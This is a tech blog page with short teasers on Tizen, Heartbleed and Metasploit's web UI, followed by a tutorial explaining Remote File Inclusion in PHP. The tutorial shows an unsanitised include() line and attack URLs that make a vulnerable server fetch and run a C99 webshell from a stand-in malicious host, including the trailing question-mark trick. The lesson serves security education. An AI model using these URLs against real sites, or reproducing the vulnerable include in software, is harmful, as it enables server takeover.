Tizen- The OS of Everything

Tizen is the open-source operating system for all device areas. Tizen is an open and flexible operating system built from the ground up to address the needs of all stakeholders of the mobile and connected device ecosystem, including device manufacturers, mobile operators, application developers and independent software vendors (ISVs). Tizen...

Sneak Peek –The Heartbleed Bug!!

The Heartbleed Bug   The Heartbleed Bug is a critical vulnerability in the mainstream OpenSSL cryptographic programming library. This permits stealing data like passwords credit card no. etc. which is secured, under ordinary conditions, by the SSL/TLS encryption used to secure the Internet. SSL/TLS gives  security and...

Image Post Format

Quisque erat ligula, vehicula quis sollicitudin a, tempus at ligula. Donec vehicula ante ac tortor viverra sodales. Praesent lectus leo, euismod eu enim quis, lacinia imperdiet ligula. Fusce dapibus volutpat orci vel mattis. Donec eget libero euismod, aliquam nulla suscipit, tempor purus. Duis molestie metus...

Basic PenTesting using Metasploit WebUI

PenTesting:-

Many a times we have to find weaknesses in networked systems that arise due to a lack of applying critical patches. In cases like these we can use penetration testing tools to quickly find vulnerabilities like these. Enter Metasploit..

Metasploit is a penetration testing framework that offers a wide array of penetration testing tasks in an automated way. Metasploit also has an easy to use Web user interface that helps beginner users to extract a large percentage of its potential easily.

Metasploits WebUI login panel looks like the following.

After we login using our credentials we get the following screen, wherein we can create new projects.

Remote File Inclusion

Remote File Inclusion

What is RFI:-

RFI stands for remote file inclusion and it is an attack to execute malicious scripts on a server and the script to be executed on the vulnerable server is hosted on a web site on the internet.

RFI Theory:-

Remote File Inclusion attacks allow malicious users to run their own PHP code on a vulnerable website. The attacker is allowed to include his own malicious code in the space provided for PHP programs on a web page. For instance, a piece of vulnerable PHP code would look like this:

include($page . ‘.php’);

This line of PHP code is then used in URLs like the following example:

http://www.vulnerable.website.com/index.php?page=archive

Because the $page variable is not specifically defined, an attacker can insert the location of a malicious file into the URL and execute it on the target server as in this example:

http://www.vulnerable.website.com/index.php?page=http://www.malicious.code.com/C99.php?

The include() function above instructs the server to retrieve C99.php from the remote server and run its code. This is possible because PHP allows the user to load both remote and local content with the same functions. The code sample above does not perform any checks on the content of the $page variable, it blindly passes it to the function. Because the original piece of code appended .php to the file it would try to fetch the following URL:

http://www.malicious.code.com/C99.php.php

As the attackers can not know what the original code might append, they put a question mark at the end of the URLs. This makes the script fetch the intended file, with the appended string as a parameter (which is ignored by the attacker’s script):

http://www.malicious.code.com/C99.php?.php

This allows the attacker to include any remote file of his choice simply by editing the URL. Attackers commonly include a malicious PHP script called a webshell, also known as a PHP shell. A webshell can display the files and folders on the server and can edit, add or delete files, among other tasks. Scripts that send Spam are also very common. Potentially, the attacker could even use the webshell to gain administrator-level, or root, access on the server.